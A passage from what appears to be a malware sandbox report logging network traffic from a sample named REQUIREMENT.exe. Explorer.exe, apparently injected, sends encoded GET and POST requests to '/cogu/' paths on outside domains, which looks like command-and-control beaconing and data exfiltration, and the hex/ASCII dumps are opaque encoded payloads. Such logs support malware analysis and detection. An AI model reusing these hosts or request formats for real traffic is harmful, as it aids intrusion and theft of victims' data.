V5rQRqmapbjA3mr5dheW9o6cfzV-LOkwvOArUyNNUzRaKBBrvqji5gboQOC_PbL6(z0JyEBZalIwnG3khSELnsXB8mV7I26dIFDMXU0UMIMeQj~pjlboTJSfxKIp4ITepZA8KW9Y21kbPg4eQdndSjadEizM3T0bD_BLDniTmwIDiLwp4AzqKN9EWStWD0GuUR~r6VLAXS5r7ljAxlU0S-j3uB89LOABGxpvkF~swuCBJ1yiqDmZIRis7uiyDUzv3yRUA-tWjxGGh3dhsFaye1wQuqb-K0BEBkCx~EyHWvUqu-Y1Ys5Qms~PIFDeCHeG6ZL5MESgRBCT3EZB8Mm7KgubX5SOIiVsnWK5GLVaPYzu9mYZD8S8iV(ehCAYuJVCZHu61hNsVq89Ioifxhxjy-5VseMcvnllDccvpmi0VG76g6QR4e4ftS~I4hSJ0niazc5RC9ALCGwChGOeIhWDQtrs6LvinF2b(y5QfZFCO4FIoTbp0fy6~RoMf1wlPuATkvptIMzGUkmDqmcwvH(fDUcmcG(SBLNKIZE7OWbvD5c02jmGJ1NuuolqII4y2lG8cQJmYZO9Un9kM0d_pEc0kSyVXiG
Oct 13, 2021 15:53:36.199657917 CEST	8566	OUT	Data Raw: 64 65 6f 66 35 54 4c 64 6b 53 58 73 35 73 73 69 54 33 73 41 63 68 31 4c 62 2d 7e 35 79 45 30 36 6b 31 28 30 57 2d 5a 49 7a 69 4f 52 57 55 58 33 32 76 6c 37 4f 61 52 32 30 4d 38 52 66 51 59 53 71 4f 76 70 77 61 6b 47 69 34 75 78 54 50 6a 5a 68 46 Data Ascii: deof5TLdkSXs5ssiT3sAch1Lb-~5yE06k1(0W-ZIziORWUX32vl7OaR20M8RfQYSqOvpwakGi4uxTPjZhFW84b9bqk633GhWB2OP8nZWofosThpsqD2sJzDiuK3fqvhalbdQgqBDg6JTuSvi8PXavhPf2FMBQ_FNAP7bS3awbeIy6kY3W88NEj8QfSnA9yoRE5Gvm9wrNWytUDIn0faaeHJFsrrID0mDEMebFqS0CCFWycn4S7n
Oct 13, 2021 15:53:36.199825048 CEST	8577	OUT	Data Raw: 30 5a 31 78 4e 38 6c 51 4a 62 36 4d 6e 54 75 6d 61 73 73 31 35 62 6d 54 51 54 54 59 45 6b 43 57 30 59 32 77 75 70 79 41 53 75 32 7a 4e 73 65 50 7e 79 7e 4a 77 42 77 2d 42 69 31 62 31 41 64 65 79 30 54 51 4c 45 48 74 6f 53 68 70 35 6e 70 48 37 45 Data Ascii: 0Z1xN8lQJb6MnTumass15bmTQTTYEkCW0Y2wupyASu2zNseP~y~JwBw-Bi1b1Adey0TQLEHtoShp5npH7E~xzPgm09H0ECm-25IfmEyQRMFqjGTSNVA5MVgB~PU9a3LszyCY1Kt3CFekqV8xHQjYDokc5fhV0H8dkJQUZb4MlXI7OYnCF25G~4OAaLfa8lF7FFC9JUtftawkHrvA8LQjx1D2ufr3fxA1Jvm90aaw(i9DkvAUaKw
Oct 13, 2021 15:53:36.200000048 CEST	8579	OUT	Data Raw: 67 44 52 44 55 39 6a 6b 75 64 39 79 6b 78 28 71 61 4f 6d 73 63 6a 74 4a 57 65 4c 31 49 71 7e 48 46 6a 69 4c 64 6b 76 47 36 4c 52 35 4f 57 42 56 47 34 4a 36 64 7a 43 68 52 46 56 6d 42 79 66 49 54 6b 69 66 58 4d 79 63 4e 30 72 79 69 74 4d 4e 53 53 Data Ascii: gDRDU9jkud9ykx(qaOmscjtJWeL1Iq~HFjiLdkvG6LR5OWBVG4J6dzChRFVmByfITkifXMycN0ryitMNSS2Yq9RLH6mHyAOjDLNVk7WL~ntpdMu5yijYyTE0ETd2d7~H3wnh0QXqPWZ-84yO~2DJjB70kGDB4OhbBETfCiUvIljfyAScSVei2iODSHoxrbcyqKjzGEhU08Yji-T0K_sE8HjUCt51mcPvWu42kdNhrNAeT7ClNga
Oct 13, 2021 15:53:36.200170040 CEST	8582	OUT	Data Raw: 64 69 64 4e 47 39 4c 4d 36 4d 51 4d 39 75 33 43 66 7a 73 53 61 79 47 58 74 35 56 58 7e 78 77 67 37 34 28 62 61 58 76 37 59 31 35 4c 71 75 6c 66 77 43 57 4f 73 42 78 71 33 36 6a 2d 64 4e 73 7a 63 65 43 6c 4c 57 34 30 64 50 36 4a 43 53 51 59 63 75 Data Ascii: didNG9LM6MQM9u3CfzsSayGXt5VX~xwg74(baXv7Y15LqulfwCWOsBxq36j-dNszceClLW40dP6JCSQYcu9yYCTSV32Fght6BCe748BiQgEqSgcMmaPwn-y3yqXEZafszJcOx1yq7n34SlADrHMDGvYbAsBG8g1ocUVNXwSCuxmR3cvWspRWS3j6JUV5j2edQM5lWnZOKkvbf83CkDmpdFJ_BpiXSPnzuabNfhF4QeXWL3avco4
Oct 13, 2021 15:53:36.350435972 CEST	8589	OUT	Data Raw: 75 48 53 5f 5a 6b 30 66 74 69 31 4a 59 72 4d 6c 45 44 4b 36 52 50 39 4c 31 54 57 4f 4b 68 72 34 31 57 33 53 67 69 6b 76 66 49 65 4e 51 61 4d 35 4f 34 76 6c 50 65 64 65 4b 68 5a 77 45 38 77 33 55 77 56 73 72 45 69 72 6b 33 6b 61 73 4a 51 45 56 52 Data Ascii: uHS_Zk0fti1JYrMlEDK6RP9L1TWOKhr41W3SgikvfIeNQaM5O4vlPedeKhZwE8w3UwVsrEirk3kasJQEVRRhFJvMz4ThAX7I1xLvBF0iGuMPcYwkfUf4dpmG2YehYBbTMBRugAk8vyp1sIv8AoTqciODZd4oYdnmk0g6NE7inuj97UYzegFlthW1fygF4DdW(Wnie9fGznHvtkCumESSYQZ87xGs~EgEgD4X79jfzkiAp-dWKro
Oct 13, 2021 15:53:36.350550890 CEST	8604	OUT	Data Raw: 77 71 6b 30 35 68 74 38 6a 4c 34 7a 6e 4c 30 52 70 68 5a 64 44 43 53 63 37 6c 28 6e 63 69 47 35 6c 35 4b 7a 52 38 45 32 34 55 6c 78 53 36 53 65 31 65 55 59 33 6f 4d 55 6a 46 72 34 55 59 4d 56 77 4a 6d 52 6a 58 7e 34 49 58 44 41 4f 34 64 71 5a 71 Data Ascii: wqk05ht8jL4znL0RphZdDCSc7l(nciG5l5KzR8E24UlxS6Se1eUY3oMUjFr4UYMVwJmRjX~4IXDAO4dqZqwa7_nLTBJhxv~Nx6rIq8mnxR27cONa1TWkG47s7GQITd70FblGb0gK5f0-eU9534JtJaZdGadmuKevHHFc2HOcHnmpAHTCqBV1iV4K~ol_GbKr8ZmEjlniOUqTDbhkwRJqXv0a5616yI2WnNFH1IPVaavpR6sDI0l
Oct 13, 2021 15:53:36.350625038 CEST	8612	OUT	Data Raw: 66 64 38 56 41 5a 6b 74 33 75 7e 62 52 34 4f 55 45 42 33 4c 4b 47 57 4b 64 51 6a 54 4f 6b 72 71 4d 2d 6b 36 70 50 61 72 73 75 49 66 73 43 65 53 66 43 4b 68 6f 33 61 32 57 75 37 72 73 64 74 62 62 38 44 57 39 44 79 52 6f 2d 36 34 58 65 4e 42 72 6a Data Ascii: fd8VAZkt3u~bR4OUEB3LKGWKdQjTOkrqM-k6pParsuIfsCeSfCKho3a2Wu7rsdtbb8DW9DyRo-64XeNBrjyuCacQuklmIxhVeNIkauM7oBOIMKjaWsnR8Uxe(qEtNz5G~QDyhFBF6fDklcXspqW2c3pCIFT62jLz5ohS6NjTprG2EOH2ooVvFp~grpiyCealTDyBiwdpAmPFELRYMzYopGT_KAe5hhtq51qr99UL9ENV1PLwEtL
Oct 13, 2021 15:53:36.350799084 CEST	8614	OUT	Data Raw: 61 43 57 33 6f 44 70 6e 70 70 6c 34 75 76 57 4c 42 64 55 74 4f 74 5a 6a 6e 5f 56 32 71 47 45 41 46 4a 69 6b 31 62 55 62 63 66 56 67 68 7a 78 41 70 75 66 4e 6b 70 6f 45 6a 61 76 69 32 49 51 5a 65 68 36 4e 64 44 4e 42 57 65 44 68 61 44 65 46 6f 53 Data Ascii: aCW3oDpnppl4uvWLBdUtOtZjn_V2qGEAFJik1bUbcfVghzxApufNkpoEjavi2IQZeh6NdDNBWeDhaDeFoS(Tcp~mXbQBfobpuVJsguqQTreZ7NSwO3WFCqBrebNj9mWf5jvnaS4LqZnrbjVaJ5l7mTWKiNPmJkIPtfXj4W2JzadTG-FrLpLCcxfM9mszJcZv12URiiGjvvBkfbty7lIeUOy5Ot58iBVr~s5QTnjxO6nUsR0r2tW
Oct 13, 2021 15:53:36.350970030 CEST	8616	OUT	Data Raw: 39 37 67 68 42 69 62 65 67 52 7a 41 34 6d 48 50 64 4b 41 66 61 62 7e 53 5a 6d 31 56 36 58 53 35 7a 43 6d 42 72 7a 42 38 5a 39 36 51 31 46 59 50 56 45 32 63 30 61 53 71 65 6c 4d 4f 74 51 48 46 4c 35 7e 2d 54 2d 72 43 39 34 79 78 72 35 30 72 44 5a Data Ascii: 97ghBibegRzA4mHPdKAfab~SZm1V6XS5zCmBrzB8Z96Q1FYPVE2c0aSqelMOtQHFL5~-T-rC94yxr50rDZr3~gEkP3zpPwIwu5pQXyrYh3cK1l3XTcx9j05ZSQteAIwVT9bjoDvf0kNvn9~kgzk1EURzQDU1abAcOwfsqesKIDuggzY6TRS32KQyOymY1pgbM9dKIXBL8ZsbKVYVCZjIgErdSJAIRWAcJYWoCE9lV0D1sQ2v0Xn
Oct 13, 2021 15:53:36.351144075 CEST	8617	OUT	Data Raw: 6b 4e 56 64 73 61 6b 78 49 32 4b 76 6d 70 70 6e 6e 7a 6a 59 70 52 55 65 75 6d 6e 53 78 73 79 4c 53 67 72 69 56 38 28 76 6b 30 4c 4e 6f 64 6c 50 33 45 51 65 6d 74 31 5a 42 56 59 38 30 55 28 70 45 56 39 6a 57 4a 73 7a 44 39 4b 67 4c 71 77 74 76 42 Data Ascii: kNVdsakxI2KvmppnnzjYpRUeumnSxsyLSgriV8(vk0LNodlP3EQemt1ZBVY80U(pEV9jWJszD9KgLqwtvBJJdeMVujH1zW11KnEUIRYViaMjQrunfdd05_77hMCuF6RIErJ_OIVVoTcLNpbwdH89I2~8Ucc3uC7vSfqjDRnhSWZvopHy9_7mkL4IUq60pqPr(4AIZjlmAAF-ePXiD-Vbg6e2SLbvaB~GxmZFMqNNYhxAmB8xHeF
Oct 13, 2021 15:53:36.657118082 CEST	8686	IN	HTTP/1.1 200 OK Date: Wed, 13 Oct 2021 21:53:36 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Status: 304 Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.11.20	49829	172.217.168.46	443	C:\Users\user\Desktop\REQUIREMENT.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.11.20	49858	216.189.108.75	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:53:36.200520992 CEST	8582	OUT	GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1 Host: www.tpmionline.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:53:36.352612019 CEST	8625	IN	HTTP/1.1 200 OK Date: Wed, 13 Oct 2021 21:53:36 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Status: 304 Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.11.20	49859	199.34.228.191	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:53:41.526828051 CEST	8697	OUT	POST /cogu/ HTTP/1.1 Host: www.shopsharpgraphics.com Connection: close Content-Length: 131140 Cache-Control: no-cache Origin: http://www.shopsharpgraphics.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.shopsharpgraphics.com/cogu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 45 36 3d 7a 35 75 32 69 6b 49 35 4f 46 74 41 49 76 31 76 35 72 52 51 5a 75 67 56 43 6f 74 71 74 52 65 52 48 61 65 30 5a 49 36 73 4f 33 28 48 4e 63 6f 39 74 74 45 67 6a 51 6c 39 6c 79 79 55 59 5f 43 4e 36 62 53 6f 46 75 54 49 6a 49 62 58 6d 4b 7e 31 59 30 35 4c 32 50 6b 6b 79 34 54 4b 75 62 4f 4c 6d 7a 72 4e 6e 30 43 30 35 52 68 56 72 33 6f 33 7e 32 38 57 61 61 74 79 6b 77 36 31 62 43 6e 6d 4a 37 7a 56 39 53 45 5f 6f 59 61 42 78 63 69 7a 59 5a 46 62 53 63 67 6c 49 76 51 55 4f 34 6a 7a 56 72 44 54 43 4b 35 4b 33 34 44 4e 72 2d 55 49 4d 4f 43 78 57 55 73 5f 74 52 76 6f 6d 56 4d 6d 58 59 55 6d 73 55 47 45 6a 51 58 38 53 68 31 67 56 6c 6a 4b 38 32 63 51 76 49 4f 64 63 39 66 32 31 73 47 37 30 34 6f 53 52 49 78 4c 46 5f 5a 70 30 76 6f 4a 78 41 72 64 33 69 63 58 30 39 62 79 43 42 44 62 6c 76 68 6c 43 6c 54 59 41 61 74 52 47 75 37 42 46 6b 5a 62 28 6e 56 54 66 4f 52 35 37 53 43 6f 70 59 67 50 75 6f 7a 72 6e 5f 32 6f 41 36 48 32 70 74 6e 55 59 53 70 70 77 5f 51 59 77 4b 63 74 6e 75 48 50 6a 6a 66 34 48 52 35 30 71 4b 4f 46 7e 39 52 68 52 46 77 56 4a 56 56 39 65 6e 79 36 65 39 66 34 44 32 34 7a 35 30 55 72 57 4a 64 47 6e 50 67 57 50 44 34 45 39 6d 28 5a 72 64 52 47 56 32 41 41 63 4b 54 7a 79 4b 62 58 6d 50 73 69 41 6c 67 7a 36 72 36 79 58 50 39 6f 74 34 4f 51 65 34 31 62 56 57 4f 59 61 41 34 46 4d 57 68 64 57 76 73 38 58 33 56 55 4c 6b 32 4e 28 72 51 56 6c 78 6c 6d 37 58 66 6f 57 71 74 79 70 71 38 51 55 4f 6f 39 31 77 36 55 51 6e 62 62 6a 56 49 78 4f 2d 33 66 49 71 6a 4a 42 45 54 54 45 66 39 66 63 6f 43 51 6b 42 75 59 41 79 6c 69 30 6a 69 30 77 6d 79 47 34 79 75 58 6e 2d 33 5f 6c 76 6b 31 47 31 6d 6f 31 6e 65 4e 36 56 4a 4e 34 39 30 73 49 48 59 42 35 44 6d 44 7a 37 39 6e 49 6b 48 56 48 66 78 47 6d 43 4b 51 56 53 6e 6c 78 2d 59 62 39 76 72 44 56 76 73 6a 42 49 35 45 66 62 48 51 30 77 37 37 46 4b 30 42 38 35 41 4c 6a 43 34 48 33 79 6e 45 61 47 58 5f 41 4f 46 5a 43 77 77 4a 66 73 73 2d 44 52 7a 6b 42 74 33 57 47 7a 61 67 7e 41 4a 5a 77 77 43 78 78 34 39 45 57 31 30 65 36 4b 7a 71 79 42 7a 6a 30 6c 47 56 6e 42 72 4a 4b 4f 59 4d 4c 4e 35 76 4f 65 71 7a 28 70 73 30 76 64 6f 56 4e 33 39 6a 76 62 62 69 72 75 28 73 55 50 35 70 65 58 36 74 6c 4a 41 43 53 67 72 54 7a 5f 41 4b 37 51 32 6b 48 4c 64 59 68 70 73 4a 43 53 69 7a 79 34 58 46 7e 55 59 73 55 77 6f 64 4c 6d 39 4d 4c 4d 44 55 38 4e 31 5a 47 72 61 51 36 41 6d 42 46 31 72 44 28 64 42 44 37 57 70 39 36 49 36 71 73 4e 51 76 6d 39 79 63 6f 42 62 58 64 45 30 55 7e 35 61 76 38 63 4d 62 31 2d 33 37 49 49 70 62 51 72 72 39 68 5a 6e 32 51 4b 61 31 78 6e 67 74 41 33 6c 4c 56 4c 58 51 48 41 69 77 65 4f 4f 68 64 64 45 35 74 73 68 6d 57 4e 75 57 49 31 79 71 61 72 34 50 34 31 7e 51 6a 75 61 47 73 30 51 64 6c 62 79 5f 6c 30 4a 6a 45 68 61 69 59 63 45 56 6b 68 77 52 75 48 35 64 4b 50 4e 49 71 34 54 58 72 6e 54 49 71 4b 75 68 68 57 64 54 51 68 4f 54 6f 66 72 36 4e 35 6e 65 72 66 6f 32 4d 6f 37 37 58 67 57 56 78 5f 4e 67 64 76 74 48 33 38 78 55 6e 6a 5a 4e 43 36 61 67 65 30 54 71 32 56 58 47 73 33 6e 57 53 58 54 35 36 4a 66 42 4b 52 4c 49 28 73 4f 77 35 4d 76 32 6a 42 35 57 75 42 4b 63 6d 6e 45 4a 4b 56 79 6d 74 47 4a 78 67 37 7e 50 43 50 6d 62 72 39 53 2d 45 45 74 56 79 72 4e 37 31 48 44 58 6b 65 76 5a 37 65 4f 76 42 57 32 6c 32 39 51 7a 49 32 37 5f 6a 79 37 51 4e 31 6e 39 4d 59 4f 4c 75 77 43 5f 58 62 50 45 6e 7a 75 45 68 36 6b 6c 75 71 31 6e 79 73 4d 66 30 33 41 34 41 64 71 65 66 79 4f 6d 5a 41 41 4c 44 46 6e 77 49 38 75 69 42 52 41 47 38 41 49 75 6d 71 75 54 74 55 70 51 50 69 7a 7a 6d 74 64 73 30 64 4b 4d 38 5f 53 61 28 58 39 34 43 4a 43 74 57 6a 43 6b 47 31 4f 4a 32 34 66 37 70 6a 49 55 77 42 65 45 71 77 53 62 61 67 76 77 4c 78 48 70 5a 63 4d 56 67 73 4b 75 56 78 4f 48 72 42 44 71 73 66 43 63 34 71 4a 51 36 31 70 75 35 76 7a 7a 4f 4d 4d 63 49 4d 45 41 4f 55 54 74 32 42 42 59 4d 73 74 62 6c 63 44 58 4e 31 61 68 48 50 66 54 35 4d 31 33 4c 51 7a 4d 42 4b 61 54 4c 4f 53 64 55 62 39 58 56 71 4e 68 36 33 7a 5f 4d 73 61 45 41 56 41 64 59 79 6d 74 37 78 74 71 45 39 78 66 69 33 4e 41 4c 73 56 34 37 63 43 66 70 31 62 52 72 6d 4e 30 73 45 58 70 57 35 63 4a 44 48 46 4a 28 7a 31 5a 42 6d 61 49 56 4f 28 58 Data Ascii: E6=z5u2ikI5OFtAIv1v5rRQZugVCotqtReRHae0ZI6sO3(HNco9ttEgjQl9lyyUY_CN6bSoFuTIjIbXmK~1Y05L2Pkky4TKubOLmzrNn0C05RhVr3o3~28Waatykw61bCnmJ7zV9SE_oYaBxcizYZFbScglIvQUO4jzVrDTCK5K34DNr-UIMOCxWUs_tRvomVMmXYUmsUGEjQX8Sh1gVljK82cQvIOdc9f21sG704oSRIxLF_Zp0voJxArd3icX09byCBDblvhlClTYAatRGu7BFkZb(nVTfOR57SCopYgPuozrn_2oA6H2ptnUYSppw_QYwKctnuHPjjf4HR50qKOF~9RhRFwVJVV9eny6e9f4D24z50UrWJdGnPgWPD4E9m(ZrdRGV2AAcKTzyKbXmPsiAlgz6r6yXP9ot4OQe41bVWOYaA4FMWhdWvs8X3VULk2N(rQVlxlm7XfoWqtypq8QUOo91w6UQnbbjVIxO-3fIqjJBETTEf9fcoCQkBuYAyli0ji0wmyG4yuXn-3_lvk1G1mo1neN6VJN490sIHYB5DmDz79nIkHVHfxGmCKQVSnlx-Yb9vrDVvsjBI5EfbHQ0w77FK0B85ALjC4H3ynEaGX_AOFZCwwJfss-DRzkBt3WGzag~AJZwwCxx49EW10e6KzqyBzj0lGVnBrJKOYMLN5vOeqz(ps0vdoVN39jvbbiru(sUP5peX6tlJACSgrTz_AK7Q2kHLdYhpsJCSizy4XF~UYsUwodLm9MLMDU8N1ZGraQ6AmBF1rD(dBD7Wp96I6qsNQvm9ycoBbXdE0U~5av8cMb1-37IIpbQrr9hZn2QKa1xngtA3lLVLXQHAiweOOhddE5tshmWNuWI1yqar4P41~QjuaGs0Qdlby_l0JjEhaiYcEVkhwRuH5dKPNIq4TXrnTIqKuhhWdTQhOTofr6N5nerfo2Mo77XgWVx_NgdvtH38xUnjZNC6age0Tq2VXGs3nWSXT56JfBKRLI(sOw5Mv2jB5WuBKcmnEJKVymtGJxg7~PCPmbr9S-EEtVyrN71HDXkevZ7eOvBW2l29QzI27_jy7QN1n9MYOLuwC_XbPEnzuEh6kluq1nysMf03A4AdqefyOmZAALDFnwI8uiBRAG8AIumquTtUpQPizzmtds0dKM8_Sa(X94CJCtWjCkG1OJ24f7pjIUwBeEqwSbagvwLxHpZcMVgsKuVxOHrBDqsfCc4qJQ61pu5vzzOMMcIMEAOUTt2BBYMstblcDXN1ahHPfT5M13LQzMBKaTLOSdUb9XVqNh63z_MsaEAVAdYymt7xtqE9xfi3NALsV47cCfp1bRrmN0sEXpW5cJDHFJ(z1ZBmaIVO(XbsnequVpO4HOF1Ygh-yTtRCngwAnniNHtzkx2zfV9Af_wK8aV5uwIqHWzrcV87lpvI1qkxfECz7YeRYnNvF2JjHEvCGObGvnYKXlI0GdEaaeM530q2g5086fsszATq6e5LQSxGZqHEBCuptjFc588xwzEQgn8XOtEPYWPGBr~r96PsSHPYjBbkBiBKpyaQ8UjjzhX6is~YSNaCJJdVY75II7qP2SO15alLOH4sn0E3DexVGJtMZImCTfioYSH0pdg_M-Kj8BBD(lr-ot5z5CnyfLBkAz5u18Wrq8KwiDdTH5bbZXqundPxHans6d5GRyAo~RES2SSccyvdSEwAa8XA51AY~ahoMFmLyrjlG0u0FrygImrO9tIpu4Vm4zqioee3ZmY3JwIY89V8gn4exy0VlXxY(ss_OIczknKuDseANPYyVOeID3txt3mwV611m7UIC55O6hAidn6SJUy01UKJIa1x1ikF7qjsUYTZpx15j8ffc-kLrZZ9vCTbnmSAzoyAUr8WO4D81Y2gEOxL~Ja-YXGMWcKk3g057xS_YnMShSIC3DKhw1C4yOAjJNYXf_4YTmjN1XOO2g1VZGyx6ueary2THp~pHxaC49RShTB09m9YiG(KhcQM0Dwc3JmT2qJiWaiU7ZL80_DfNwimTwlPEGPF8QQGmPgnV_DOjE0lgHGyt8nFIJXCBhmFrMlX9wmnHQCwyxlOsTZDTfpqRcgQq_~Nl4ZaoRTArfmRjtdpj53W9oATgWiLtsxvfKxVNQat18BHBHwOhZHgbzAXdwJKfyoFaaCDmc7D9lpgFyfB4B8Y3rj7EzLTwzvGj1fLm1jJqT4u91WWNQcmv6IOofd-CqcswwDp5YLdH23rG02cAjb8rii3Bug5g-9uscTPmYrz3X~dmRBEGjahWUsTUtXcpuxS4bBr04Wijp4fEllsGjwaVkdPIXUDoBrEA9uad8tEEI6322lBmzCgcEqk4D(nGmmvfMu4WEdml2nJN53NKTcp3qNEkWtWYu(-jRMSNIrOEh3r0BrtxKE46jUygt9MY6TzfF33viZvercELpEsC_sk(-6Cq1AzJ8o_X7a5OB74ynmj3n~LanjBIhOlflGv7S3jwBQt2SRPSGi3067hsNeSAO2tVrKaVPuIkFMKTy2G09pEbr2EIq2ixuUw1vpW2AO4Wm7xbTWYKmsJHp7y0rhyh24hd-jONjG0OhZPm1Nm8ZDtHUMsWuYvezCTXLp6gLD1PrVySQYeQQ(8LJfy9F6nst1jQJElgQoIQkvXILZF9P0O502GgxUfDP4LE23-jZp2cteqIikTliwgkQVCob89pGyJV2B1x8XqdqSFDl5niNqy6x89i74f9kpXyEtC9FZh~ooDy2F6ie9jPWSJ76FsegltmhGsALZxFRewDPGdt-s6trxIHqAESFPp2-rlmboyvkI0XDhB~a3OJS8BP8YCbBoejMqfePuMVwN5cmqlTIOF6IU1yytC0G2WFQOpn07OVxJxAcI992xEMVI6kiMjqUdLogFmoJltWQioNiasukXJVU3DogC5u_JbiC~nvR35LJSMv4p55n0P9WjrK-KwpEF4mdWye2ZM8sjBvmcNgIVkrCPO0DE_7zqC(IxwReGJMW73r7Rhe1D7cCHEYHHsAAHwFeoFdf3o2tCszFh-Lji2Sel_Eal104iYxc1xn_HcDwl02UVRh477nZPmrmvMIpPzIizhO-~A5h5e~gBKrrrQBrhSSOW_siElevXPbKJhfLQSA3G3ANY2m4RXTvL0VhQTWPBS(S6-PdJx~zLHGFEiZlb_3bvdBWEsTc3GcJ5fVlEDezmGvRkb14Eqm87tX_5brkWAJ-RaKSvp2zFLE4IG9H~7KzkcJqJjJ-sYzXPw9m2fCQ6gpZrp9mR2pgFAMhkTl5oDn_9fPsvXVZwD0ZiRkANWGmzxHFvh9-eVl3pTQSR6uiTzTK2vPXOR6rxP~0mUJAsmP6tdAoeDOWmZEtUslBL7pdx9uermlT018lpujBdRsqJopGvuPWXq1r7NT8GTdVLXnPhKYHxDMqhQ3JtKediOrd8s(x2EhVJbDZKMCZIRj_zal5dvkNjT1axubNrF2oxy87GguvCB(YZPixaubIjuZKQ0zy128i9bwoCunEEmaTRA~qmtCI7Vlv4HbVTLxjy5r36UoV30lZ2FbZbnMU7ZqCOJov8CHPYq1mY1i6zpiW6xcHMiHNwoP1q1ou7nxeLMwnxnDD0Cfh0c6Wb0pX(Uy1MaWTK3FkDo8_oUcQfUStU6xLhlBK1b24bXl9flrRiAFdR3KDuwMLJbmFIuexs-nVLU6aM2mhbowGRxgdv8T7nt9sT4tF7DF24T2D~kJY2n7YkGUW5bYjk2XVL0cfQ1dwa5mmL6fV4AUgdL1T5NFB9gz5GgbtKmmryaqzlOf9h9eDduOYwO4DYBNTMgz_oNmo(RB-n4n8ByrrNRdar7drh4Di~RswzH(m5jzwH1XXgZFZ6UJ0PreK99qosBGkuCjf2r~MzB5YmMj_TEQfArSoucFCxTYEmTTRKbnlpnSYYy93suPXm5MXq0hXEwViqb0vJW9WcvqAL9IzDEcv1I1ov7jVIdhtymBbH1crCD1y9TGoXSvDTXjEwxrPYcv2Tgg1HaqRGbEy2dlAfqld(2We3vi4x1RyX7q4vCH2y5bJfvNjmY2lktNRWWfas5rBuOcEk2oiGwVC2VNIyuGSd32HEyJ
Oct 13, 2021 15:53:41.526865005 CEST	8700	OUT	Data Raw: 37 69 69 43 41 78 5f 54 61 74 39 30 69 6f 6c 46 6b 28 42 62 6c 4a 72 6a 4d 61 58 30 50 7a 45 38 30 61 4b 50 78 4f 35 48 7a 76 69 42 41 78 68 69 71 62 67 58 72 63 57 7e 37 39 67 5a 59 48 2d 36 41 62 69 49 54 49 64 7e 79 6b 45 59 6e 74 55 4c 76 61 Data Ascii: 7iiCAx_Tat90iolFk(BblJrjMaX0PzE80aKPxO5HzviBAxhiqbgXrcW~79gZYH-6AbiITId~ykEYntULva5tMYUYFPZZFrDZgbzGomhjuj7libYGLTTlaSTLVdzz5ljB39igeUP2KPbnBcY6D0kC0VIN0R9FUpdrNzabmRmg9tf3hsBgIPuvNxu069Flncd98v9xNDYnp9Oc7N_sfNnI_PFa5gflH1_zehxUDMi15RhunmuI0cv
Oct 13, 2021 15:53:41.686937094 CEST	8708	OUT	Data Raw: 32 30 65 4e 54 37 53 7e 4e 71 6e 48 35 75 75 46 34 4d 62 43 6e 77 35 56 63 36 4e 6e 33 62 5a 36 4e 28 5a 57 4d 4c 45 6b 35 61 55 41 4c 79 4d 30 5a 56 58 36 2d 51 33 76 55 68 70 53 35 55 4e 35 74 75 71 4d 66 33 50 48 37 62 52 71 4b 4f 44 71 52 28 Data Ascii: 20eNT7S~NqnH5uuF4MbCnw5Vc6Nn3bZ6N(ZWMLEk5aUALyM0ZVX6-Q3vUhpS5UN5tuqMf3PH7bRqKODqR(5Evc061gP4WiU3mIFgT7KcgeCVBMPCfp4unGv5B6LshG1(Jrm8iluE21PkmFIJTb7sFzp2EPPhbcR1eVEpD8fw3RmYIuAp0B13pJHdeUHtOKdVeKnWqZJZQR0Ff6ORzkLZMZfE9(UDTkGe_(62gEhsgxC0qgLobJB
Oct 13, 2021 15:53:41.687051058 CEST	8711	OUT	Data Raw: 6f 34 43 6c 5f 65 6f 62 4f 42 4f 69 50 63 5a 47 55 36 69 30 6f 34 6c 63 34 79 75 4d 51 45 63 46 4b 36 70 4d 73 45 57 6b 6a 47 73 52 48 6a 4d 48 4a 6d 49 77 4a 69 49 70 52 36 58 4c 70 72 50 59 74 64 4e 49 61 46 41 6c 72 76 66 36 6b 38 6d 49 74 43 Data Ascii: o4Cl_eobOBOiPcZGU6i0o4lc4yuMQEcFK6pMsEWkjGsRHjMHJmIwJiIpR6XLprPYtdNIaFAlrvf6k8mItCw5MkHns9RR1K8yk8zk7MrXzsJfIqO1RjD2xKKouqiqfjJpxL0LvV6ZofnFYnr23XTUH2aWIiqga0Io8KKeZUJKH3CHf4HwDidoJ1AtB9hkWKgL0KJQ9XWOy8hBdbJ2PEdj4bYUAuX5-2X7bK_42dZ5kBWeL6SlKoU
Oct 13, 2021 15:53:41.687237024 CEST	8726	OUT	Data Raw: 6c 61 43 41 57 56 57 4d 62 49 64 6b 65 4c 61 68 36 30 79 57 63 54 32 54 45 43 34 4c 79 63 61 4a 7a 30 74 67 6f 46 7a 73 48 66 70 66 6c 7e 78 30 4c 74 74 72 4f 72 78 41 54 6f 69 68 2d 78 34 66 52 57 70 64 2d 6f 4d 6b 66 43 59 39 69 34 62 56 51 7e Data Ascii: laCAWVWMbIdkeLah60yWcT2TEC4LycaJz0tgoFzsHfpfl~x0LttrOrxAToih-x4fRWpd-oMkfCY9i4bVQ~oOTNHR_(My9A-Vhc8RKoZGe3nqxiwb5GW2WTO1ZQleePby4XtzSYqD4WOvDjR5qQTy1qu(D1e3PZ7op0vIsb0bezbx8YOgHUwwwQ4xmhbc65yY2QqcU7QR3egLgoKgFUt7iVuBKTde0yOomsETfWck4234pt9wGOp
